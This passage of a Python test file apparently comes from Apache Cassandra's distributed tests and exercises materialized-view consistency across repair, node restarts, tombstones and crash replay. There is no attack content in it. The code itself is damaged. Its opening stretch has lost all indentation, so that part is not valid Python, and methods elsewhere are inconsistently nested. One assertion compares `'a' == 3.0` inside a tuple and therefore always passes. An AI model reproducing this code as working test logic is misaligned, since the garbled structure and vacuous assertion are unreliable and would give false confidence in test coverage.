        self.check_trace_events(result.get_query_trace(), False)
        # Verify values one last time
        assert_one(
            session,
            "SELECT * FROM t_by_v WHERE v = 1",
            [1, 1, 'b', 3.0],
            cl=ConsistencyLevel.ALL
        )
def check_trace_events(self, trace, expect_digest):
# we should see multiple requests get enqueued prior to index scan
# execution happening
# Look for messages like:
# 4.0+ Digest mismatch: Mismatch for key DecoratedKey
# <4.0 Digest mismatch: org.apache.cassandra.service.DigestMismatchException: Mismatch for key DecoratedKey
regex = r"Digest mismatch: ([a-zA-Z.]+:\s)?Mismatch for key DecoratedKey"
for event in trace.events:
desc = event.description
match = re.match(regex, desc)
if match:
if expect_digest:
break
else:
pytest.fail("Encountered digest mismatch when we shouldn't")
else:
if expect_digest:
pytest.fail("Didn't find digest mismatch")
def test_simple_repair_by_base(self):
self._simple_repair_test(repair_base=True)
def test_simple_repair_by_view(self):
self._simple_repair_test(repair_view=True)
def _simple_repair_test(self, repair_base=False, repair_view=False):
"""
Test that a materialized view are consistent after a simple repair.
"""
session = self.prepare(rf=3, options={'hinted_handoff_enabled': False})
node1, node2, node3 = self.cluster.nodelist()
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Shutdown node2')
node2.stop(wait_other_notice=True)
for i in range(1000):
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
self._replay_batchlogs()
logger.debug('Verify the data in the MV with CL=ONE')
for i in range(1000):
assert_one(
session,
"SELECT * FROM t_by_v WHERE v = {}".format(i),
[i, i, 'a', 3.0]
)
logger.debug('Verify the data in the MV with CL=ALL. All should be unavailable.')
for i in range(1000):
statement = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
assert_unavailable(
session.execute,
statement
)
logger.debug('Start node2, and repair')
node2.start(wait_for_binary_proto=True)
if repair_base:
node1.nodetool("repair ks t")
if repair_view:
node1.nodetool("repair ks t_by_v")
logger.debug('Verify the data in the MV with CL=ALL. All should be available now and no digest mismatch')
for i in range(1000):
query = SimpleStatement(
"SELECT * FROM t_by_v WHERE v = {}".format(i),
consistency_level=ConsistencyLevel.ALL
)
result = session.execute(query, trace=True)
self.check_trace_events(result.get_query_trace(), False)
assert self._rows_to_list(result.current_rows), [[i, i, 'a' == 3.0]]
def test_base_replica_repair(self):
self._base_replica_repair_test()
def test_base_replica_repair_with_contention(self):
"""
Test repair does not fail when there is MV lock contention
@jira_ticket CASSANDRA-12905
"""
self._base_replica_repair_test(fail_mv_lock=True)
    def _base_replica_repair_test(self, fail_mv_lock=False):
        """
        Test that a materialized view is consistent after the repair of the base replica.

        :param fail_mv_lock: when True, restart node1 with
            -Dcassandra.test.fail_mv_locks_count to simulate MV lock contention
            during repair (CASSANDRA-12905)
        """
        self.prepare(rf=3)
        node1, node2, node3 = self.cluster.nodelist()
        session = self.patient_exclusive_cql_connection(node1)
        session.execute('USE ks')
        session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
        session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        logger.debug('Write initial data')
        for i in range(1000):
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
        self._replay_batchlogs()
        logger.debug('Verify the data in the MV with CL=ALL')
        for i in range(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.ALL
            )
        # wipe node1 entirely so it must be rebuilt via repair
        logger.debug('Shutdown node1')
        node1.stop(wait_other_notice=True)
        logger.debug('Delete node1 data')
        node1.clear(clear_all=True)
        jvm_args = []
        if fail_mv_lock:
            if self.cluster.version() >= LooseVersion('3.10'):  # CASSANDRA-10134
                jvm_args = ['-Dcassandra.allow_unsafe_replace=true', '-Dcassandra.replace_address={}'.format(node1.address())]
            jvm_args.append("-Dcassandra.test.fail_mv_locks_count=1000")
            # this should not make Keyspace.apply throw WTE on failure to acquire lock
            node1.set_configuration_options(values={'write_request_timeout_in_ms': 100})
        logger.debug('Restarting node1 with jvm_args={}'.format(jvm_args))
        node1.start(wait_for_binary_proto=True, jvm_args=jvm_args)
        logger.debug('Shutdown node2 and node3')
        node2.stop(wait_other_notice=True)
        node3.stop(wait_other_notice=True)
        session = self.patient_exclusive_cql_connection(node1)
        session.execute('USE ks')
        logger.debug('Verify that there is no data on node1')
        for i in range(1000):
            assert_none(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i)
            )
        logger.debug('Restarting node2 and node3')
        node2.start(wait_for_binary_proto=True)
        node3.start(wait_for_binary_proto=True)
        # Just repair the base replica
        logger.debug('Starting repair on node1')
        node1.nodetool("repair ks t")
        logger.debug('Verify data with cl=ALL')
        for i in range(1000):
            assert_one(
                session,
                "SELECT * FROM t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
    @pytest.mark.resource_intensive
    def test_complex_repair(self):
        """
        Test that materialized views are consistent after a more complex repair:
        two disjoint replica groups receive conflicting writes while the other
        group is down, then a global repair reconciles them.
        """
        session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
        node1, node2, node3, node4, node5 = self.cluster.nodelist()
        # we create the base table with gc_grace_seconds=5 so batchlog will expire after 5 seconds
        session.execute("CREATE TABLE ks.t (id int PRIMARY KEY, v int, v2 text, v3 decimal)"
                        "WITH gc_grace_seconds = 5")
        session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        logger.debug('Shutdown node2 and node3')
        node2.stop()
        node3.stop(wait_other_notice=True)
        logger.debug('Write initial data to node1 (will be replicated to node4 and node5)')
        for i in range(1000):
            session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i))
        logger.debug('Verify the data in the MV on node1 with CL=ONE')
        for i in range(1000):
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0]
            )
        logger.debug('Close connection to node1')
        session.cluster.shutdown()
        logger.debug('Shutdown node1, node4 and node5')
        node1.stop()
        node4.stop()
        node5.stop()
        logger.debug('Start nodes 2 and 3')
        node2.start()
        node3.start(wait_for_binary_proto=True)
        session2 = self.patient_cql_connection(node2)
        logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
        for i in range(1000):
            assert_none(
                session2,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i)
            )
        logger.debug('Write new data in node2 and node3 that overlap those in node1, node4 and node5')
        for i in range(1000):
            # we write i*2 as value, instead of i
            session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0)".format(v=i * 2))
        logger.debug('Verify the new data in the MV on node2 with CL=ONE')
        for i in range(1000):
            v = i * 2
            assert_one(
                session2,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
                [v, v, 'a', 3.0]
            )
        logger.debug('Wait for batchlogs to expire from node2 and node3')
        time.sleep(5)
        logger.debug('Start remaining nodes')
        node1.start(wait_for_binary_proto=True)
        node4.start(wait_for_binary_proto=True)
        node5.start(wait_for_binary_proto=True)
        session = self.patient_cql_connection(node1)
        logger.debug('Read data from MV at QUORUM (old data should be returned)')
        for i in range(1000):
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(i),
                [i, i, 'a', 3.0],
                cl=ConsistencyLevel.QUORUM
            )
        logger.debug('Run global repair on node1')
        node1.repair()
        logger.debug('Read data from MV at quorum (new data should be returned after repair)')
        for i in range(1000):
            v = i * 2
            assert_one(
                session,
                "SELECT * FROM ks.t_by_v WHERE v = {}".format(v),
                [v, v, 'a', 3.0],
                cl=ConsistencyLevel.QUORUM
            )
    @pytest.mark.resource_intensive
    def test_throttled_partition_update(self):
        """
        @jira_ticket: CASSANDRA-13299, test break up large partition when repairing base with mv.
        Provide a configurable batch size (cassandra.mv.mutation.row.count=100) to throttle the
        number of rows to be applied in one mutation
        """
        session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
        node1, node2, node3, node4, node5 = self.cluster.nodelist()
        for node in self.cluster.nodelist():
            node.nodetool("disableautocompaction")
        session.execute("CREATE TABLE ks.t (pk int, ck1 int, ck2 int, v1 int, v2 int, PRIMARY KEY(pk, ck1, ck2))")
        session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                         "WHERE pk IS NOT NULL AND ck1 IS NOT NULL AND ck2 IS NOT NULL "
                         "PRIMARY KEY (pk, ck2, ck1)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        logger.debug('Shutdown node2 and node3')
        node2.stop(wait_other_notice=True)
        node3.stop(wait_other_notice=True)
        size = 50
        range_deletion_ts = 30
        partition_deletion_ts = 10
        # build one large partition (pk=1) of size*size rows; each row's write
        # timestamp equals its ck1, which the deletion timestamps below key off
        for ck1 in range(size):
            for ck2 in range(size):
                session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
                                " VALUES (1, {}, {}, {}, {}) USING TIMESTAMP {}".format(ck1, ck2, ck1, ck2, ck1))
        self._replay_batchlogs()
        for ck1 in range(size):
            for ck2 in range(size):
                assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
                           [1, ck1, ck2, ck1, ck2])
                assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2),
                           [1, ck1, ck2, ck1, ck2])
        logger.debug('Shutdown node4 and node5')
        node4.stop(wait_other_notice=True)
        node5.stop(wait_other_notice=True)
        # apply a mix of tombstone kinds that only node1 will hold
        for ck1 in range(size):
            for ck2 in range(size):
                if ck1 % 2 == 0:  # range tombstone
                    session.execute("DELETE FROM ks.t USING TIMESTAMP 50 WHERE pk=1 AND ck1={}".format(ck1))
                elif ck1 == ck2:  # row tombstone
                    session.execute("DELETE FROM ks.t USING TIMESTAMP 60 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
                elif ck1 == ck2 - 1:  # cell tombstone
                    session.execute("DELETE v2 FROM ks.t USING TIMESTAMP 70 WHERE pk=1 AND ck1={} AND ck2={}".format(ck1, ck2))
        # range deletion
        session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 < 30 and ck1 > 20".format(range_deletion_ts))
        session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1 and ck1 = 20 and ck2 < 10".format(range_deletion_ts))
        # partition deletion for ck1 <= partition_deletion_ts
        session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=1".format(partition_deletion_ts))
        # only partition deletion for the pk=2000
        session.execute("DELETE FROM ks.t USING TIMESTAMP {} WHERE pk=2000".format(partition_deletion_ts))
        self._replay_batchlogs()
        # start nodes with different batch size
        logger.debug('Starting nodes')
        node2.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(2)])
        node3.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5)])
        node4.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(50)])
        node5.start(wait_for_binary_proto=True, jvm_args=["-Dcassandra.repair.mutation_repair_rows_per_batch={}".format(5000)])
        self._replay_batchlogs()
        logger.debug('repairing base table')
        node1.nodetool("repair ks t")
        # insert data to the deleted partition with pk=2000, they should be considered dead
        session.execute("INSERT INTO ks.t (pk, ck1, ck2, v1, v2)"
                        " VALUES (2000, 0, 0, 0, 0) USING TIMESTAMP {}".format(partition_deletion_ts - 1))
        self._replay_batchlogs()
        logger.debug('stop cluster')
        self.cluster.stop()
        logger.debug('rolling restart to check repaired data on each node')
        for node in self.cluster.nodelist():
            logger.debug('starting {}'.format(node.name))
            node.start(wait_for_binary_proto=True)
            # CL=ONE against each node individually, so every replica is checked
            session = self.patient_cql_connection(node, consistency_level=ConsistencyLevel.ONE)
            for ck1 in range(size):
                for ck2 in range(size):
                    if (
                        ck1 <= partition_deletion_ts or  # partition deletion
                        ck1 == ck2 or ck1 % 2 == 0 or  # row deletion or range tombstone
                        (ck1 > 20 and ck1 < 30) or (ck1 == 20 and ck2 < 10)  # range tombstone
                    ):
                        assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                             "ck1={} AND ck2={}".format(ck1, ck2))
                        assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                             "ck1={} AND ck2={}".format(ck1, ck2))
                    elif ck1 == ck2 - 1:  # cell tombstone
                        assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                            "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
                        assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                            "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, None])
                    else:
                        assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=1 AND "
                                            "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
                        assert_one(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=1 AND "
                                            "ck1={} AND ck2={}".format(ck1, ck2), [1, ck1, ck2, ck1, ck2])
            # Verify partition deletion with pk=2000 has no live data
            assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t WHERE pk=2000")
            assert_none(session, "SELECT pk,ck1,ck2,v1,v2 FROM ks.t_by_v WHERE pk=2000")
            logger.debug('stopping {}'.format(node.name))
            node.stop(wait_other_notice=True, wait_for_binary_proto=True)
    @pytest.mark.resource_intensive
    def test_really_complex_repair(self):
        """
        Test that materialized views are consistent after a more complex repair,
        with a composite-key view and deletes issued on the second replica group.
        """
        session = self.prepare(rf=5, options={'hinted_handoff_enabled': False}, nodes=5)
        node1, node2, node3, node4, node5 = self.cluster.nodelist()
        # we create the base table with gc_grace_seconds=1 so batchlogs and
        # tombstones become purgeable almost immediately (see sleep below)
        session.execute("CREATE TABLE ks.t (id int, v int, v2 text, v3 decimal, PRIMARY KEY(id, v, v2))"
                        "WITH gc_grace_seconds = 1")
        session.execute(("CREATE MATERIALIZED VIEW ks.t_by_v AS SELECT * FROM t "
                         "WHERE v IS NOT NULL AND id IS NOT NULL AND v IS NOT NULL AND "
                         "v2 IS NOT NULL PRIMARY KEY (v2, v, id)"))
        session.cluster.control_connection.wait_for_schema_agreement()
        logger.debug('Shutdown node2 and node3')
        node2.stop(wait_other_notice=True)
        node3.stop(wait_other_notice=True)
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'a', 3.0)")
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'a', 3.0)")
        self._replay_batchlogs()
        logger.debug('Verify the data in the MV on node1 with CL=ONE')
        assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]])
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'b', 3.0)")
        session.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'b', 3.0)")
        self._replay_batchlogs()
        logger.debug('Verify the data in the MV on node1 with CL=ONE')
        assert_all(session, "SELECT * FROM ks.t_by_v WHERE v2 = 'b'", [['b', 1, 1, 3.0], ['b', 2, 2, 3.0]])
        session.shutdown()
        logger.debug('Shutdown node1, node4 and node5')
        node1.stop()
        node4.stop()
        node5.stop()
        logger.debug('Start nodes 2 and 3')
        node2.start()
        node3.start(wait_for_binary_proto=True)
        session2 = self.patient_cql_connection(node2)
        session2.execute('USE ks')
        logger.debug('Verify the data in the MV on node2 with CL=ONE. No rows should be found.')
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'")
        logger.debug('Write new data in node2 that overlap those in node1')
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'c', 3.0)")
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'c', 3.0)")
        self._replay_batchlogs()
        assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'", [['c', 1, 1, 3.0], ['c', 2, 2, 3.0]])
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (1, 1, 'd', 3.0)")
        session2.execute("INSERT INTO ks.t (id, v, v2, v3) VALUES (2, 2, 'd', 3.0)")
        self._replay_batchlogs()
        assert_all(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'", [['d', 1, 1, 3.0], ['d', 2, 2, 3.0]])
        logger.debug("Composite delete of everything")
        session2.execute("DELETE FROM ks.t WHERE id = 1 and v = 1")
        session2.execute("DELETE FROM ks.t WHERE id = 2 and v = 2")
        self._replay_batchlogs()
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'c'")
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'd'")
        logger.debug('Wait for batchlogs to expire from node2 and node3')
        time.sleep(5)
        logger.debug('Start remaining nodes')
        node1.start(wait_for_binary_proto=True)
        node4.start(wait_for_binary_proto=True)
        node5.start(wait_for_binary_proto=True)
        # at this point the data isn't repaired so we have an inconsistency.
        # this value should return None
        assert_all(
            session2,
            "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", [['a', 1, 1, 3.0], ['a', 2, 2, 3.0]],
            cl=ConsistencyLevel.QUORUM
        )
        logger.debug('Run global repair on node1')
        node1.repair()
        assert_none(session2, "SELECT * FROM ks.t_by_v WHERE v2 = 'a'", cl=ConsistencyLevel.QUORUM)
def test_complex_mv_select_statements(self):
    """
    Test complex MV select statements
    @jira_ticket CASSANDRA-9664

    For each candidate MV primary-key layout, creates a view filtered on
    ``a = 1 AND b IS NOT NULL AND c = 1`` and checks that inserts, updates
    and deletes are reflected in the view exactly when they match the
    filter.
    """
    cluster = self.cluster
    cluster.set_configuration_options({'enable_materialized_views': 'true'})
    cluster.populate(3).start()
    node1 = cluster.nodelist()[0]
    # All statements in this test run at QUORUM against node1.
    session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)

    logger.debug("Creating keyspace")
    session.execute("CREATE KEYSPACE mvtest WITH replication = "
                    "{'class': 'SimpleStrategy', 'replication_factor': '3'}")
    session.execute('USE mvtest')

    # Same columns every time; only the key structure of the MV varies.
    mv_primary_keys = ["((a, b), c)",
                       "((b, a), c)",
                       "(a, b, c)",
                       "(c, b, a)",
                       "((c, a), b)"]
    for mv_primary_key in mv_primary_keys:
        # A fresh base table (and MV) is created per layout and dropped at
        # the end of each iteration.
        session.execute("CREATE TABLE test (a int, b int, c int, d int, PRIMARY KEY (a, b, c))")

        insert_stmt = session.prepare("INSERT INTO test (a, b, c, d) VALUES (?, ?, ?, ?)")
        # Parameter order is (d, a, b, c): the new value first, then the key.
        update_stmt = session.prepare("UPDATE test SET d = ? WHERE a = ? AND b = ? AND c = ?")
        delete_stmt1 = session.prepare("DELETE FROM test WHERE a = ? AND b = ? AND c = ?")
        delete_stmt2 = session.prepare("DELETE FROM test WHERE a = ?")
        session.cluster.control_connection.wait_for_schema_agreement()

        # Seed rows: only (1, 0, 1, 0) and (1, 1, 1, 0) satisfy the MV filter.
        rows = [(0, 0, 0, 0),
                (0, 0, 1, 0),
                (0, 1, 0, 0),
                (0, 1, 1, 0),
                (1, 0, 0, 0),
                (1, 0, 1, 0),
                (1, 1, -1, 0),
                (1, 1, 0, 0),
                (1, 1, 1, 0)]
        for row in rows:
            session.execute(insert_stmt, row)

        logger.debug("Testing MV primary key: {}".format(mv_primary_key))

        session.execute("CREATE MATERIALIZED VIEW mv AS SELECT * FROM test WHERE "
                        "a = 1 AND b IS NOT NULL AND c = 1 PRIMARY KEY {}".format(mv_primary_key))
        # Give the view build a moment to complete before querying it.
        time.sleep(3)

        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new rows that does not match the filter
        session.execute(insert_stmt, (0, 0, 1, 0))
        session.execute(insert_stmt, (1, 1, 0, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # insert new row that does match the filter
        session.execute(insert_stmt, (1, 2, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update rows that does not match the filter
        session.execute(update_stmt, (1, 1, -1, 0))
        session.execute(update_stmt, (0, 1, 1, 0))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # update a row that does match the filter (sets d=2 on (1, 1, 1))
        session.execute(update_stmt, (2, 1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete rows that does not match the filter
        session.execute(delete_stmt1, (1, 1, -1))
        session.execute(delete_stmt1, (2, 0, 1))
        session.execute(delete_stmt2, (0,))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 1, 1, 2], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a row that does match the filter
        session.execute(delete_stmt1, (1, 1, 1))
        assert_all(
            session, "SELECT a, b, c, d FROM mv",
            [[1, 0, 1, 0], [1, 2, 1, 0]],
            ignore_order=True,
            cl=ConsistencyLevel.QUORUM
        )

        # delete a partition that matches the filter
        session.execute(delete_stmt2, (1,))
        assert_all(session, "SELECT a, b, c, d FROM mv", [], cl=ConsistencyLevel.QUORUM)

        # Cleanup
        session.execute("DROP MATERIALIZED VIEW mv")
        session.execute("DROP TABLE test")
def propagate_view_creation_over_non_existing_table(self):
    """
    The internal addition of a view over a non existing table should be ignored
    @jira_ticket CASSANDRA-13737

    NOTE(review): the name lacks the ``test_`` prefix, so pytest will not
    collect it - confirm whether that is intentional.
    """
    cluster = self.cluster
    cluster.populate(3)
    cluster.start()
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_cql_connection(node1, consistency_level=ConsistencyLevel.QUORUM)
    create_ks(session, 'ks', 3)
    session.execute('CREATE TABLE users (username varchar PRIMARY KEY, state varchar)')

    # create a materialized view only in nodes 1 and 2
    node3.stop(wait_other_notice=True)
    session.execute(('CREATE MATERIALIZED VIEW users_by_state AS '
                     'SELECT * FROM users WHERE state IS NOT NULL AND username IS NOT NULL '
                     'PRIMARY KEY (state, username)'))

    # drop the base table only in node 3
    node1.stop(wait_other_notice=True)
    node2.stop(wait_other_notice=True)
    node3.start(wait_for_binary_proto=True)
    session = self.patient_cql_connection(node3, consistency_level=ConsistencyLevel.QUORUM)
    session.execute('DROP TABLE ks.users')

    # restart the cluster
    cluster.stop()
    cluster.start()

    # node3 should have received and ignored the creation of the MV over the dropped table
    assert node3.grep_log('Not adding view users_by_state because the base table')
def test_base_view_consistency_on_failure_after_mv_apply(self):
    # Crash the base write *after* the view mutations have been applied.
    self._test_base_view_consistency_on_crash("after")
def test_base_view_consistency_on_failure_before_mv_apply(self):
    # Crash the base write *before* the view mutations have been applied.
    self._test_base_view_consistency_on_crash("before")
def _test_base_view_consistency_on_crash(self, fail_phase):
    """
    * Fails base table write before or after applying views
    * Restart node and replay commit and batchlog
    * Check that base and views are present

    @jira_ticket CASSANDRA-13069
    """
    self.cluster.set_batch_commitlog(enabled=True)
    # The injected byteman fault logs "Dummy failure"; both patterns are
    # expected noise for this test.
    self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
    self.prepare(rf=1, install_byteman=True)
    node1, node2, node3 = self.cluster.nodelist()
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')

    session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
    session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
                     "WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
    session.cluster.control_connection.wait_for_schema_agreement()

    logger.debug('Make node1 fail {} view writes'.format(fail_phase))
    node1.byteman_submit([mk_bman_path('fail_{}_view_write.btm'.format(fail_phase))])

    logger.debug('Write 1000 rows - all node1 writes should fail')
    # NOTE(review): range(1, 1000) issues 999 inserts, not the 1000 the log
    # message suggests - confirm which is intended.
    failed = False
    for i in range(1, 1000):
        try:
            session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
        except WriteFailure:
            failed = True

    assert failed, "Should fail at least once."
    assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"

    # Count rows missing from either the base table or the view, reading at
    # CL=ONE against the node where writes were failed.
    missing_entries = 0
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    for i in range(1, 1000):
        view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        if not base_entry:
            missing_entries += 1
        if not view_entry:
            missing_entries += 1

    logger.debug("Missing entries {}".format(missing_entries))
    assert missing_entries > 0

    logger.debug('Restarting node1 to ensure commit log is replayed')
    node1.stop(wait_other_notice=True)
    # Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
    node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])

    logger.debug('Replay batchlogs')
    time.sleep(0.001)  # Wait batchlog.replay_timeout_in_ms=1 (ms)
    self._replay_batchlogs()

    logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
    session = self.patient_exclusive_cql_connection(node1)
    session.execute('USE ks')
    for i in range(1, 1000):
        view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
                                                                  consistency_level=ConsistencyLevel.ONE)))
        assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
        assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
# Classification of a single read-verification outcome (names and values
# intentionally identical to the original class-based declaration).
MutationPresence = Enum(
    'MutationPresence',
    [('match', 1), ('extra', 2), ('missing', 3), ('excluded', 4), ('unknown', 5)],
)
class MM(object):
    """Base class for read-verification results; subclasses set `mp`."""

    mp = None  # MutationPresence tag, assigned by each subclass

    def out(self):
        """Return a printable description of the result, or None."""
        return None
class Match(MM):
    """Result: base table and view agree for this row."""

    def __init__(self):
        self.mp = MutationPresence.match

    def out(self):
        # Matches need no report.
        return None
class Extra(MM):
    """Result: the view returned a row, but the base value differs."""

    # Class-level defaults so the attributes always exist on instances.
    expecting = None
    value = None
    row = None

    def __init__(self, expecting, value, row):
        self.mp = MutationPresence.extra
        self.expecting = expecting
        self.value = value
        self.row = row

    def out(self):
        return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
    """Result: the base table has the value but the view returned no row."""

    # Class-level defaults so the attributes always exist on instances.
    value = None
    row = None

    def __init__(self, value, row):
        self.mp = MutationPresence.missing
        self.value = value
        self.row = row

    def out(self):
        return "Missing. At {}".format(self.row)
class Excluded(MM):
    """Result: row not expected in the base table and absent from the view."""

    def __init__(self):
        self.mp = MutationPresence.excluded

    def out(self):
        # Correct exclusions need no report.
        return None
class Unknown(MM):
    """Result: any other combination (e.g. the view returned multiple rows)."""

    def __init__(self):
        self.mp = MutationPresence.unknown

    def out(self):
        return None
# Consistency levels used by the read-verification and write helpers below.
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
# Lightweight record mirroring the (a, b, c, d) columns of mvtest.test1.
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
    """Deterministically map sequence number `i` onto a SimpleRow."""
    partition_key = i % num_partitions
    clustering_key = (i % 400) // num_partitions
    return SimpleRow(a=partition_key, b=clustering_key, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
    """Open a dedicated connection to `ip` and verify rows [start, end).

    Each generated row is read back through the MV (mvtest.mv1) and
